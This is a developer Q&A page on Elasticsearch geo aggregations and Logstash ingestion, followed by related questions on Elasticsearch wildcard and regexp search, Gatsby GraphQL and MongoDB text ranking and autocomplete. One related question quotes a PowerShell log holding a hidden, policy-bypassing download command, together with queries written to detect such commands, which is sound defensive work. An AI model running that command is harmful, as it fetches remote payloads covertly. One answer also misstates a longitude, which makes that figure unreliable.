Using Elastic Search Geo Functionality To Find Most Common Locations?

I have a geojson file containing a list of locations each with a longitude, latitude and timestamp. Note the longitudes and latitudes are multiplied by 10000000.
{
"locations" : [ {
"timestampMs" : "1461820561530",
"latitudeE7" : -378107308,
"longitudeE7" : 1449654070,
"accuracy" : 35,
"junk_i_want_to_save_but_ignore" : [ { .. } ]
}, {
"timestampMs" : "1461820455813",
"latitudeE7" : -378107279,
"longitudeE7" : 1449673809,
"accuracy" : 33
}, {
"timestampMs" : "1461820281089",
"latitudeE7" : -378105184,
"longitudeE7" : 1449254023,
"accuracy" : 35
}, {
"timestampMs" : "1461820155814",
"latitudeE7" : -378177434,
"longitudeE7" : 1429653949,
"accuracy" : 34
}
..
Many of these locations will be the same physical location (e.g. the user's home) but obviously the longitude and latitudes may not be exactly the same.
I would like to use Elasticsearch and its geo functionality to produce a ranked list of the most common locations, where locations are deemed to be the same if they are within, say, 100m of each other.
For each common location I'd also like the list of all timestamps they were at that location if possible!
I'd very much appreciate a sample query to get me started!
Many thanks in advance.

In order to make it work you need to modify your mapping like this:
PUT /locations
{
"mappings": {
"location": {
"properties": {
"location": {
"type": "geo_point"
},
"timestampMs": {
"type": "long"
},
"accuracy": {
"type": "long"
}
}
}
}
}
Then, when you index your documents, you need to divide the latitude and longitude by 10000000, and index like this:
PUT /locations/location/1
{
"timestampMs": "1461820561530",
"location": {
"lat": -37.8103308,
"lon": 14.4967407
},
"accuracy": 35
}
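The division step can be sketched in JavaScript roughly as follows. The helper name toGeoPoint is made up for illustration; it assumes one raw entry of the "locations" array as input and converts timestampMs to a number so that it fits the "long" mapping.

```javascript
// Hypothetical helper (not part of any library): converts one raw entry
// of the "locations" array into a document matching the mapping above.
function toGeoPoint(raw) {
  const E7 = 10000000; // the source stores degrees multiplied by 10^7
  return {
    timestampMs: Number(raw.timestampMs), // stored as a string in the source
    location: {
      lat: raw.latitudeE7 / E7,
      lon: raw.longitudeE7 / E7,
    },
    accuracy: raw.accuracy,
  };
}

// First entry of the sample data from the question
const doc = toGeoPoint({
  timestampMs: "1461820561530",
  latitudeE7: -378107308,
  longitudeE7: 1449654070,
  accuracy: 35,
});
console.log(JSON.stringify(doc));
```

For the first sample entry this gives a latitude of -37.8107308 and a longitude of 144.965407.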
Finally, your search query below...
POST /locations/location/_search
{
"aggregations": {
"zoomedInView": {
"filter": {
"geo_bounding_box": {
"location": {
"top_left": "-37, 14",
"bottom_right": "-38, 15"
}
}
},
"aggregations": {
"zoom1": {
"geohash_grid": {
"field": "location",
"precision": 6
},
"aggs": {
"ts": {
"date_histogram": {
"field": "timestampMs",
"interval": "15m",
"format": "EEE yyyy-MM-dd HH:mm"
}
}
}
}
}
}
}
}
...will yield the following result:
{
"aggregations": {
"zoomedInView": {
"doc_count": 1,
"zoom1": {
"buckets": [
{
"key": "k362cu",
"doc_count": 1,
"ts": {
"buckets": [
{
"key_as_string": "Thu 2016-04-28 05:15",
"key": 1461820500000,
"doc_count": 1
}
]
}
}
]
}
}
}
}
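Whether a given precision is close enough to the "100m" in the question depends on the size of a geohash cell. The sketch below estimates that size from the number of bits in the hash. The metres-per-degree constant is a rough equatorial value and an assumption of this sketch; cells get narrower away from the equator. Also keep in mind that grid cells are fixed, so two points a few metres apart can still land in neighbouring cells.

```javascript
// Approximate size of a geohash cell for a given precision (hash length).
// Each character carries 5 bits, split between longitude and latitude,
// with longitude getting the extra bit when the total is odd.
function geohashCellSize(precision) {
  const bits = 5 * precision;
  const lonBits = Math.ceil(bits / 2);
  const latBits = Math.floor(bits / 2);
  const metersPerDegree = 111320; // rough value at the equator (assumption)
  return {
    widthMeters: (360 / 2 ** lonBits) * metersPerDegree,
    heightMeters: (180 / 2 ** latBits) * metersPerDegree,
  };
}

for (const precision of [6, 7, 8]) {
  const { widthMeters, heightMeters } = geohashCellSize(precision);
  console.log(precision, Math.round(widthMeters), Math.round(heightMeters));
}
```

By this estimate precision 6 cells are roughly 1.2 km by 0.6 km, while precision 7 cells are roughly 150 m on each side, so precision 7 is probably the closer fit for the question.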
UPDATE
According to our discussion, here is a solution that could work for you. Using Logstash, you can call your API and retrieve the big JSON document (using the http_poller input), extract/transform all locations and sink them to Elasticsearch (with the elasticsearch output) very easily.
Here is how it goes in order to format each event as depicted in my initial answer.
Using http_poller you can retrieve the JSON locations (note that I've set the polling interval to 1 day, but you can change that to some other value, or simply run Logstash manually each time you want to retrieve the locations)
Then we split the locations array into individual events
Then we divide the latitude/longitude fields by 10,000,000 to get proper coordinates
We also need to clean it up a bit by moving and removing some fields
Finally, we just send each event to Elasticsearch
Logstash configuration locations.conf:
input {
http_poller {
urls => {
get_locations => {
method => get
url => "http://your_api.com/locations.json"
headers => {
Accept => "application/json"
}
}
}
request_timeout => 60
interval => 86400
codec => "json"
}
}
filter {
split {
field => "locations"
}
ruby {
code => "
event['location'] = {
'lat' => event['locations']['latitudeE7'] / 10000000.0,
'lon' => event['locations']['longitudeE7'] / 10000000.0
}
"
}
mutate {
add_field => {
"timestampMs" => "%{[locations][timestampMs]}"
"accuracy" => "%{[locations][accuracy]}"
"junk_i_want_to_save_but_ignore" => "%{[locations][junk_i_want_to_save_but_ignore]}"
}
remove_field => [
"locations", "@timestamp", "@version"
]
}
}
output {
elasticsearch {
hosts => ["localhost:9200"]
index => "locations"
document_type => "location"
}
}
You can then run with the following command:
bin/logstash -f locations.conf
When that has run, you can launch your search query and you should get what you expect.
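Once the search response comes back, the buckets can be turned into the ranked list the question asks for. This is only a sketch: rankLocations is a made-up name, the response shape is assumed to match the result shown earlier, and the second bucket in the sample is invented for illustration.

```javascript
// Turns the aggregation part of a search response into a ranked list of
// locations, each with the time slots in which it was visited.
function rankLocations(response) {
  const buckets = response.aggregations.zoomedInView.zoom1.buckets;
  return buckets
    .map((bucket) => ({
      geohash: bucket.key,
      visits: bucket.doc_count,
      // one entry per non-empty 15-minute slot
      times: bucket.ts.buckets
        .filter((slot) => slot.doc_count > 0)
        .map((slot) => slot.key_as_string),
    }))
    .sort((a, b) => b.visits - a.visits); // most visited first
}

const response = {
  aggregations: {
    zoomedInView: {
      doc_count: 3,
      zoom1: {
        buckets: [
          // bucket copied from the result shown earlier
          { key: "k362cu", doc_count: 1, ts: { buckets: [
            { key_as_string: "Thu 2016-04-28 05:15", key: 1461820500000, doc_count: 1 },
          ] } },
          // made-up bucket, for illustration only
          { key: "k362cv", doc_count: 2, ts: { buckets: [
            { key_as_string: "Thu 2016-04-28 05:00", key: 1461819600000, doc_count: 2 },
          ] } },
        ],
      },
    },
  },
};

const ranked = rankLocations(response);
console.log(JSON.stringify(ranked, null, 2));
```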

Related

AWS ElasticSearch Query for Keyword not getting results I expect

I have an ElasticSearch query that looks like:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"Message.keyword": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"Message.keyword": "*system.net.webclient).downloadfile(*"
}
}
]
}
}
}
}
}
And a Doc in my Index that includes:
message:Engine state is changed from None to Available. Details: NewEngineState=Available PreviousEngineState=None SequenceNumber=13 HostName=ConsoleHost HostVersion=5.1.18362.628 HostId=3dd1a50a-cc15-45e0-bf63-4456d556fb67 HostApplication=powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download EngineVersion=5.1.18362.628 RunspaceId=de762b62-056c-4be1-90bf-a12cfe6fbc72
As you can see above it includes:
(New-Object System.Net.WebClient).DownloadFile('https:....
It seems like the filter here should be matching the message, but when I execute the Query through Kibana, nothing matches even though I can see the doc above inside my index through Kibana UI if I just query for *.
I think maybe this is because the query above is querying for Message.keyword? How do I get it to successfully hit the document above?
Edit:
mapping: https://pastebin.com/cWN4jF3d
Sample data: https://pastebin.com/SyErqaG8

There are two reasons for the query not returning the result:
The field name in mapping is message whereas in query you are using Message.
A field with the keyword datatype indexes the data as-is, which means matching is case-sensitive. The document you shared contains the text System.Net.WebClient).DownloadFile( with upper-case characters, whereas the search pattern you expect to match, "*system.net.webclient).downloadfile(*", is all lower case.
Therefore the query should be:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"message.keyword": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"message.keyword": "*System.Net.WebClient).DownloadFile(*"
}
}
]
}
}
}
}
}
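The case-sensitivity point can be illustrated outside Elasticsearch. The function below is only a rough emulation of how a wildcard pattern is compared against a single keyword value; it is not how Elasticsearch implements the query, and wildcardMatches is a made-up name.

```javascript
// Rough emulation of a wildcard query against one keyword value:
// "*" matches any run of characters, "?" matches exactly one, and the
// comparison is case-sensitive and must cover the whole value.
function wildcardMatches(pattern, value) {
  // escape regex metacharacters other than the two wildcard characters
  const escaped = pattern.replace(/[.+^${}()|[\]\\]/g, "\\$&");
  const source = escaped.replace(/\*/g, ".*").replace(/\?/g, ".");
  return new RegExp("^" + source + "$", "s").test(value);
}

// Excerpt of the message from the question
const value =
  "-command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download";

const mixedCase = wildcardMatches("*System.Net.WebClient).DownloadFile(*", value);
const lowerCase = wildcardMatches("*system.net.webclient).downloadfile(*", value);
console.log(mixedCase, lowerCase);
```

Only the pattern whose case matches the stored value succeeds.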

The keyword fields are used only for exact match. You will need to match the regular fields if you only want to match a substring / subset of the string, by querying on Message instead of Message.keyword:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"Message": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"Message": "*system.net.webclient).downloadfile(*"
}
}
]
}
}
}
}
}

error in graphQL using imageSharp regex with gatsby

I'm using Gatsby to create a simple blog. When I try to search for a specific image, I get an error from GraphQL. I have the following configs:
installed "gatsby-image": "^1.0.55"
graphql`
query MainLayoutQuery {
heroImage: imageSharp(id: { regex: "/hero.jpg/" }) {
id
sizes(quality: 100) {
base64
tracedSVG
aspectRatio
src
srcSet
srcWebp
srcSetWebp
sizes
originalImg
originalName
}
}
}
`
When I run that query in the GraphQL UI, I get:
{
"errors": [
{
"message": "Cannot read property 'id' of undefined",
"locations": [
{
"line": 31,
"column": 3
}
],
"path": [
"heroImage"
]
}
],
"data": {
"heroImage": null
}
}
But, if I run the same query without the regex, it works fine:
{
heroImage: imageSharp {
id
sizes(quality: 100) {
base64
tracedSVG
aspectRatio
src
srcSet
srcWebp
srcSetWebp
sizes
originalImg
originalName
}
}
}
Of course, it returns the first image it has access to:
"data": {
"heroImage": {
"id": "/Users/marcosrios/dev/workspace/atravesando-todo-limite/src/posts/2018-08-25-tengo-miedo/cover.png absPath of file >> ImageSharp"
}
}

Which version of Gatsby are you using? If it is v2, you need to edit your query, as there have been changes:
https://next.gatsbyjs.org/docs/migrating-from-v1-to-v2/#dont-query-nodes-by-id
Your query would then look like this:
graphql`
query MainLayoutQuery {
heroImage: imageSharp(fluid: { originalName: { regex: "/hero.jpg/" } }) {
id
fluid(quality: 100) {
base64
tracedSVG
aspectRatio
src
srcSet
srcWebp
srcSetWebp
sizes
originalImg
originalName
}
}
}
`

How to search "\....\" using regexp in elasticsearch

My indexed data contains some documents with values like this -
"exclude y:\dkj....\sdfisd\sdfsdf\asdfai"
My requirement is to find all documents containing such entries, based on "\....\". For this I am using "regexp".
I have tried the regular expressions below, but none of them worked for me -
".*\\(\.\.\.\.)\\.*"
".*?[\.]{4}.*"
".*\\[\.]{4}\\.*"
Below is the part of my query which I am firing to elasticsearch.
"bool" : {
"must" : [ {
"query_string" : {
"query" : "\"DC2\"",
"default_field" : "COLLECTOR_NAME"
}
}, {
"regexp" : {
"RAW_EVENT_DATA" : {
"value" : ".*?[\\.]{4}.*",
"flags_value" : 0
}
}
} ]
}
Please provide some suggestions.

This is usually related to the analyzer.
Let us create a type with the following mapping:
{
"my_index": {
"mappings": {
"test": {
"properties": {
"title": {
"type": "string"
},
"title_raw": {
"type": "string",
"index": "not_analyzed"
}
}
}
}
}
}
Add new document
POST my_index/test/1
{
"title":"exclude y:\\dkj....\\sdfisd\\sdfsdf\\asdfai",
"title_raw":"exclude y:\\dkj....\\sdfisd\\sdfsdf\\asdfai"
}
Now search it
POST my_index/test/_search
{
"query": {
"regexp" : {
"title" : {
"value" : ".*?[\\.]{4}.*",
"flags_value" : 0
}
}
}
}
This returns an empty result.
But the not_analyzed field works perfectly with regexp:
POST my_index/test/_search
{
"query": {
"regexp" : {
"title_raw" : {
"value" : ".*?[\\.]{4}.*",
"flags_value" : 0
}
}
}
}
You can check the documentation on analysis to get an idea of why this happens. Because the title field uses the standard analyzer, part of the information is lost at the indexing stage and is not available during search.
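To make the loss of information concrete, here is a small sketch. The roughAnalyze function is a very rough stand-in for the standard analyzer (lowercase, split on anything that is not a letter or digit) and is an assumption made for illustration, not Lucene's actual tokenizer. The point is that a regexp query is applied to each indexed term as a whole, and none of the analyzed terms contains the dots.

```javascript
// Very rough stand-in for the standard analyzer (an assumption for
// illustration only): lowercase, then split on non-alphanumerics.
function roughAnalyze(text) {
  return text.toLowerCase().split(/[^a-z0-9]+/).filter(Boolean);
}

// A regexp query has to match an indexed term in its entirety.
function anyTermMatches(terms, regex) {
  return terms.some((term) => regex.test(term));
}

const raw = "exclude y:\\dkj....\\sdfisd\\sdfsdf\\asdfai";
const fourDots = /^.*?[.]{4}.*$/; // anchored, like a whole-term match

const analyzedTerms = roughAnalyze(raw); // dots and backslashes are gone
const notAnalyzedTerms = [raw];          // the whole value is one term

console.log(analyzedTerms);
console.log(anyTermMatches(analyzedTerms, fourDots));
console.log(anyTermMatches(notAnalyzedTerms, fourDots));
```

The analyzed field ends up with the terms exclude, y, dkj, sdfisd, sdfsdf and asdfai, so only the not_analyzed value can match.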

MongoDB Search and Sort, with Number of Matches and Exact Match

I want to create a small MongoDB search query that sorts the result set by exact match first, followed by number of matches.
For example, if I have the following labels
Physics
11th-Physics
JEE-IIT-Physics
Physics-Physics
Then, if I search for "Physics" it should sort as
Physics
Physics-Physics
11th-Physics
JEE-IIT-Physics

Looking for the sort of "scoring" you are talking about here is an exercise in "imperfect solutions". In this case, the "best fit" starts with "text search", and "imperfect" is the term to keep in mind when working with the text search capabilities of MongoDB.
MongoDB is "not" a dedicated "text search" product, nor is it ( like most databases ) trying to be one. The full capabilities of "text search" are reserved for dedicated products that have this as their area of expertise. So it may not be the best fit, but "text search" is offered as an option for those who can live with the limitations and don't want to run another engine. Or not yet, at least.
With that said, let's look at what you can do with the data sample as given. First set up some data in a collection:
db.junk.insert([
{ "data": "Physics" },
{ "data": "11th-Physics" },
{ "data": "JEE-IIT-Physics" },
{ "data": "Physics-Physics" },
{ "data": "Something Unrelated" }
])
Then of course, to "enable" the text search capabilities, you need to index at least one of the fields in the document with the "text" index type:
db.junk.createIndex({ "data": "text" })
Now that is "ready to go", let's have a look at a first basic query:
db.junk.find(
{ "$text": { "$search": "\"Physics\"" } },
{ "score": { "$meta": "textScore" } }
).sort({ "score": { "$meta": "textScore" } })
That is going to give results like this:
{
"_id" : ObjectId("55af83b964876554be823f33"),
"data" : "Physics-Physics",
"score" : 1.5
}
{
"_id" : ObjectId("55af83b964876554be823f30"),
"data" : "Physics",
"score" : 1
}
{
"_id" : ObjectId("55af83b964876554be823f31"),
"data" : "11th-Physics",
"score" : 0.75
}
{
"_id" : ObjectId("55af83b964876554be823f32"),
"data" : "JEE-IIT-Physics",
"score" : 0.6666666666666666
}
So that is "close" to your desired result, but of course there is no "exact match" component. In addition, the logic used by the text search capabilities with the $text operator means that "Physics-Physics" is the preferred match here.
This is because the engine does not recognize "non-words" such as the "hyphen" in between. To it, the word "Physics" appears several times in the indexed content for the document, and therefore it has a higher score.
Now the rest of your logic depends on the application of "exact match" and what you mean by that. If you are looking for "Physics" in the string and "not" surrounded by "hyphens" or other characters, then the following does not suit. But you can just match a field "value" that is "exactly" just "Physics":
db.junk.aggregate([
{ "$match": {
"$text": { "$search": "Physics" }
}},
{ "$project": {
"data": 1,
"score": {
"$add": [
{ "$meta": "textScore" },
{ "$cond": [
{ "$eq": [ "$data", "Physics" ] },
10,
0
]}
]
}
}},
{ "$sort": { "score": -1 } }
])
And that will give you a result that both looks at the "textScore" produced by the engine and then applies some math with a logical test. In this case, where the "data" is exactly equal to "Physics", we "weight" the score by an additional amount using $add:
{
"_id": ObjectId("55af83b964876554be823f30"),
"data" : "Physics",
"score" : 11
}
{
"_id" : ObjectId("55af83b964876554be823f33"),
"data" : "Physics-Physics",
"score" : 1.5
}
{
"_id" : ObjectId("55af83b964876554be823f31"),
"data" : "11th-Physics",
"score" : 0.75
}
{
"_id" : ObjectId("55af83b964876554be823f32"),
"data" : "JEE-IIT-Physics",
"score" : 0.6666666666666666
}
That is what the aggregation framework can do for you, by allowing manipulation of the returned data with additional conditions. The end result is passed to the $sort stage ( notice it sorts in descending order ) so that the new value becomes the sorting key.
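For reference, the same arithmetic can be reproduced in plain JavaScript. This is only an emulation of the $project and $sort stages, using the textScore values copied from the first query output; rankWithExactBonus is a made-up name.

```javascript
// textScore values copied from the first query output
const matched = [
  { data: "Physics-Physics", textScore: 1.5 },
  { data: "Physics", textScore: 1 },
  { data: "11th-Physics", textScore: 0.75 },
  { data: "JEE-IIT-Physics", textScore: 0.6666666666666666 },
];

// Emulates $add: [ textScore, $cond(data == term ? bonus : 0) ]
// followed by $sort: { score: -1 }.
function rankWithExactBonus(docs, term, bonus = 10) {
  return docs
    .map((d) => ({
      data: d.data,
      score: d.textScore + (d.data === term ? bonus : 0),
    }))
    .sort((a, b) => b.score - a.score);
}

const ranked = rankWithExactBonus(matched, "Physics");
console.log(ranked.map((d) => `${d.data}: ${d.score}`));
```

The bonus of 10 is arbitrary; it only has to be larger than any textScore the engine is likely to produce.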
But the aggregation framework can really only deal with "exact matches" like this on strings. There is no facility at present to deal with regular expression matches or index positions in strings that return a meaningful value for projection. Not even a logical match. And the $regex operation is only used to "filter" in queries, so it is of no use here.
So if you were looking for something in a "phrase" that was a bit more involved than a "string equals" exact match, then the other option is using mapReduce.
This is another "imperfect" approach, as the limitations of the mapReduce command mean that the "textScore" from such a query by the engine is "completely gone". While the actual documents will be selected correctly, the inherent "ranking data" is not available to the engine. This is a by-product of how MongoDB "projects" the "score" into the document in the first place, and "projection" is not a feature available to mapReduce.
But you can "play with" the strings using JavaScript, as in my "imperfect" sample:
db.junk.mapReduce(
function() {
var _id = this._id,
score = 0;
delete this._id;
score += this.data.indexOf(search);
score += this.data.lastIndexOf(search);
emit({ "score": score, "id": _id }, this);
},
function() {},
{
"out": { "inline": 1 },
"query": { "$text": { "$search": "Physics" } },
"scope": { "search": "Physics" }
}
)
Which gives results like this:
{
"_id" : {
"score" : 0,
"id" : ObjectId("55af83b964876554be823f30")
},
"value" : {
"data" : "Physics"
}
},
{
"_id" : {
"score" : 8,
"id" : ObjectId("55af83b964876554be823f33")
},
"value" : {
"data" : "Physics-Physics"
}
},
{
"_id" : {
"score" : 10,
"id" : ObjectId("55af83b964876554be823f31")
},
"value" : {
"data" : "11th-Physics"
}
},
{
"_id" : {
"score" : 16,
"id" : ObjectId("55af83b964876554be823f32")
},
"value" : {
"data" : "JEE-IIT-Physics"
}
}
My own "silly little algorithm" here is basically taking both the "first" and "last" index position of the matched string and adding them together to produce a score. It's likely not what you really want, but the point is that if you can code your logic in JavaScript, then you can throw it at the engine to produce the desired "ranking".
The only real "trick" to remember is that the "score" must be the "leading" part of the grouping "key", and that if you include the original document _id value then that composite key part must be renamed, otherwise the _id will take precedence in the ordering.
This is just part of mapReduce where, as an "optimization", all output "key" values are sorted in "ascending order" before being processed by the reducer. The reducer of course does nothing here since we are not "aggregating", but just using the JavaScript runner and document reshaping of mapReduce in general.
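The scoring itself is easy to try outside the database. The snippet below is a plain JavaScript sketch of the same "first plus last index" idea, with an explicit ascending sort standing in for the key ordering that mapReduce applies; positionScore is a made-up name.

```javascript
// Same scoring as in the map function: first index plus last index
// of the search term within the string.
function positionScore(text, search) {
  return text.indexOf(search) + text.lastIndexOf(search);
}

const labels = ["JEE-IIT-Physics", "11th-Physics", "Physics-Physics", "Physics"];

// The explicit ascending sort stands in for mapReduce's key ordering.
const ranked = labels
  .map((data) => ({ score: positionScore(data, "Physics"), data }))
  .sort((a, b) => a.score - b.score);

console.log(ranked);
```

This yields the scores 0, 8, 10 and 16, in the same order as the mapReduce output.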
So the overall note is, those are the available options. None of them is perfect, but you might be able to live with them or even just "accept" the default engine result.
If you want more, then look at external "dedicated" text search products, which would be better suited.
Side Note: The $text searches here are preferred over $regex because they can use an index. A "non-anchored" regular expression ( without the caret ^ ) cannot use an index optimally with MongoDB. Therefore the $text searches are generally going to be a better base for finding "words" within a phrase.

Another way is to use the $indexOfCP aggregation operator to get the index of the matched string and then sort on that computed field:
Data insertion
db.junk.insert([
{ "data": "Physics" },
{ "data": "11th-Physics" },
{ "data": "JEE-IIT-Physics" },
{ "data": "Physics-Physics" },
{ "data": "Something Unrelated" }
])
Query
const data = "Physics";
db.junk.aggregate([
{ "$match": { "data": { "$regex": data, "$options": "i" }}},
{ "$addFields": { "score": { "$indexOfCP": [{ "$toLower": "$data" }, { "$toLower": data }]}}},
{ "$sort": { "score": 1 }}
])
The query produces the following output:
[
{
"_id": ObjectId("5a934e000102030405000000"),
"data": "Physics",
"score": 0
},
{
"_id": ObjectId("5a934e000102030405000003"),
"data": "Physics-Physics",
"score": 0
},
{
"_id": ObjectId("5a934e000102030405000001"),
"data": "11th-Physics",
"score": 5
},
{
"_id": ObjectId("5a934e000102030405000002"),
"data": "JEE-IIT-Physics",
"score": 8
}
]
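Note that "Physics" and "Physics-Physics" both get a score of 0, so the sort alone does not decide which of the two comes first. One possible tie-breaker, which is my assumption and not part of the query above, is the string length (in the pipeline that could be a second computed field using $strLenCP). A plain JavaScript emulation of the idea, with the made-up name rankByPosition:

```javascript
// Emulates $match + $addFields { score: $indexOfCP } and adds a length
// tie-breaker (an assumption, not part of the original query).
function rankByPosition(labels, term) {
  const needle = term.toLowerCase();
  return labels
    .map((data) => ({
      data,
      score: data.toLowerCase().indexOf(needle),
      length: data.length,
    }))
    .filter((d) => d.score >= 0) // mirrors the $match stage
    .sort((a, b) => a.score - b.score || a.length - b.length);
}

const ranked = rankByPosition(
  ["Physics-Physics", "JEE-IIT-Physics", "Something Unrelated", "11th-Physics", "Physics"],
  "Physics"
);
console.log(ranked.map((d) => d.data));
```

With the tie-breaker the exact match "Physics" reliably sorts ahead of "Physics-Physics".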

Implement auto-complete feature using MongoDB search

I have a MongoDB collection of documents of the form
{
"id": 42,
"title": "candy can",
"description": "canada candy canteen",
"brand": "cannister candid",
"manufacturer": "candle canvas"
}
I need to implement an auto-complete feature based on the input search term by matching in all fields except id. For example, if the input term is can, then I should return all matching words in the document as
{ hints: ["candy", "can", "canada", "canteen", ...] }
I looked at this question but it didn't help. I also tried searching how to do regex search in multiple fields and extract matching tokens, or extracting matching tokens in a MongoDB text search but couldn't find any help.

tl;dr
There is no easy solution for what you want, since normal queries can't modify the fields they return. There is a solution (running the mapReduce below inline instead of writing its output to a collection), but except for very small databases, it is not possible to do this in real time.
The problem
As written, a normal query can't really modify the fields it returns. But there are other problems. If you want to do a regex search in halfway decent time, you would have to index all fields, which would need a disproportionate amount of RAM for that feature. If you didn't index all fields, a regex search would cause a collection scan, which means that every document would have to be loaded from disk, which would take too long for autocompletion to be convenient. Furthermore, multiple simultaneous users requesting autocompletion would create considerable load on the backend.
The solution
The problem is quite similar to one I have already answered: we need to extract every word out of multiple fields, remove the stop words, and save the remaining words in a collection, each together with a link to the document(s) the word was found in. Then, to get an autocompletion list, we simply query the indexed word list.
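Independent of MongoDB, the idea can be sketched in plain JavaScript as a small inverted index. This is a simplified illustration under my own assumptions (the name buildWordIndex, lowercasing, the "id" field name from the question, and no filtering of numeric tokens); it is not the mapReduce job itself.

```javascript
const STOPWORDS = new Set(["the", "this", "and", "or"]);

// Builds word -> Set of document ids from all string fields except "id".
function buildWordIndex(docs) {
  const index = new Map();
  for (const doc of docs) {
    for (const [field, value] of Object.entries(doc)) {
      if (field === "id" || typeof value !== "string") continue;
      for (const token of value.split(/\s+/)) {
        const word = token.replace(/[;,.]/g, "").toLowerCase();
        if (!word || STOPWORDS.has(word)) continue;
        if (!index.has(word)) index.set(word, new Set());
        index.get(word).add(doc.id);
      }
    }
  }
  return index;
}

// Sample document from the question
const index = buildWordIndex([
  {
    id: 42,
    title: "candy can",
    description: "canada candy canteen",
    brand: "cannister candid",
    manufacturer: "candle canvas",
  },
]);
console.log([...index.keys()].sort());
```

Each word appears once as a key, no matter how many fields or documents it occurs in, which is the same deduplication the words collection provides.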
Step 1: Use a map/reduce job to extract the words
db.yourCollection.mapReduce(
// Map function
function() {
// We need to save this in a local var as per scoping problems
var document = this;
// You need to expand this according to your needs
var stopwords = ["the","this","and","or"];
for(var prop in document) {
// We are only interested in strings and explicitly not in _id
if(prop === "_id" || typeof document[prop] !== 'string') {
continue
}
(document[prop]).split(" ").forEach(
function(word){
// You might want to adjust this to your needs
var cleaned = word.replace(/[;,.]/g,"")
if(
// We neither want stopwords...
stopwords.indexOf(cleaned) > -1 ||
// ...nor string which would evaluate to numbers
!(isNaN(parseInt(cleaned))) ||
!(isNaN(parseFloat(cleaned)))
) {
return
}
emit(cleaned,document._id)
}
)
}
},
// Reduce function
function(k,v){
// Kind of ugly, but works.
// Improvements more than welcome!
var values = { 'documents': []};
v.forEach(
function(vs){
if(values.documents.indexOf(vs)>-1){
return
}
values.documents.push(vs)
}
)
return values
},
{
// We need this for two reasons...
finalize:
function(key,reducedValue){
// First, we ensure that each resulting document
// has the documents field in order to unify access
var finalValue = {documents:[]}
// Second, we ensure that each document is unique in said field
if(reducedValue.documents) {
// We filter the existing documents array
finalValue.documents = reducedValue.documents.filter(
function(item,pos,self){
// The default return value
var loc = -1;
for(var i=0;i<self.length;i++){
// We have to do it this way since indexOf only works with primitives
if(self[i].valueOf() === item.valueOf()){
// We have found the value of the current item...
loc = i;
//... so we are done for now
break
}
}
// If the location we found equals the position of item, they are equal
// If it isn't equal, we have a duplicate
return loc === pos;
}
);
} else {
finalValue.documents.push(reducedValue)
}
// We have sanitized our data, now we can return it
return finalValue
},
// Our result are written to a collection called "words"
out: "words"
}
)
Running this mapReduce against your example would result in db.words looking like this:
{ "_id" : "can", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
{ "_id" : "canada", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
{ "_id" : "candid", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
{ "_id" : "candle", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
{ "_id" : "candy", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
{ "_id" : "cannister", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
{ "_id" : "canteen", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
{ "_id" : "canvas", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
Note that the individual words are the _id of the documents. The _id field is indexed automatically by MongoDB. Since MongoDB tries to keep indices in RAM, we can do a few tricks to both speed up autocompletion and reduce the load put on the server.
Step 2: Query for autocompletion
For autocompletion, we only need the words, without the links to the documents.
Since the words are indexed, we use a covered query – a query answered only from the index, which usually resides in RAM.
To stick with your example, we would use the following query to get the candidates for autocompletion:
db.words.find({_id:/^can/},{_id:1})
which gives us the result
{ "_id" : "can" }
{ "_id" : "canada" }
{ "_id" : "candid" }
{ "_id" : "candle" }
{ "_id" : "candy" }
{ "_id" : "cannister" }
{ "_id" : "canteen" }
{ "_id" : "canvas" }
Using the .explain() method, we can verify that this query uses only the index.
{
"cursor" : "BtreeCursor _id_",
"isMultiKey" : false,
"n" : 8,
"nscannedObjects" : 0,
"nscanned" : 8,
"nscannedObjectsAllPlans" : 0,
"nscannedAllPlans" : 8,
"scanAndOrder" : false,
"indexOnly" : true,
"nYields" : 0,
"nChunkSkips" : 0,
"millis" : 0,
"indexBounds" : {
"_id" : [
[
"can",
"cao"
],
[
/^can/,
/^can/
]
]
},
"server" : "32a63f87666f:27017",
"filterSet" : false
}
Note the indexOnly:true field.
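The index bounds "can" and "cao" in the explain output show why the anchored regex is cheap: a prefix search becomes a range scan from the prefix up to the prefix with its last character incremented. Here is a small JavaScript sketch of that idea. The function names are made up, it assumes a non-empty prefix, and it uses a simple filter where a real index would do a range lookup.

```javascript
// Upper bound for a prefix scan: bump the last character by one,
// e.g. "can" -> "cao". Assumes a non-empty prefix.
function prefixUpperBound(prefix) {
  const last = prefix.charCodeAt(prefix.length - 1);
  return prefix.slice(0, -1) + String.fromCharCode(last + 1);
}

// Returns all words in the half-open range [prefix, upperBound).
function completions(sortedWords, prefix) {
  const upper = prefixUpperBound(prefix);
  return sortedWords.filter((word) => word >= prefix && word < upper);
}

const words = [
  "cab", "can", "canada", "candid", "candle",
  "candy", "cannister", "canteen", "canvas", "cap",
];
const hints = completions(words, "can");
console.log(prefixUpperBound("can"), hints);
```

Words such as "cab" and "cap" fall outside the range and are never looked at by an index scan.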
Step 3: Query the actual document
Although we have to do two queries to get the actual document, the overall process is fast enough that the user experience should still be good.
Step 3.1: Get the document of the words collection
When the user selects one of the autocompletion choices, we have to query the complete document from words in order to find the documents in which the chosen word originated.
db.words.find({_id:"canteen"})
which would result in a document like this:
{ "_id" : "canteen", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
Step 3.2: Get the actual document
With that document, we can now either show a page with search results or, like in this case, redirect to the actual document which you can get by:
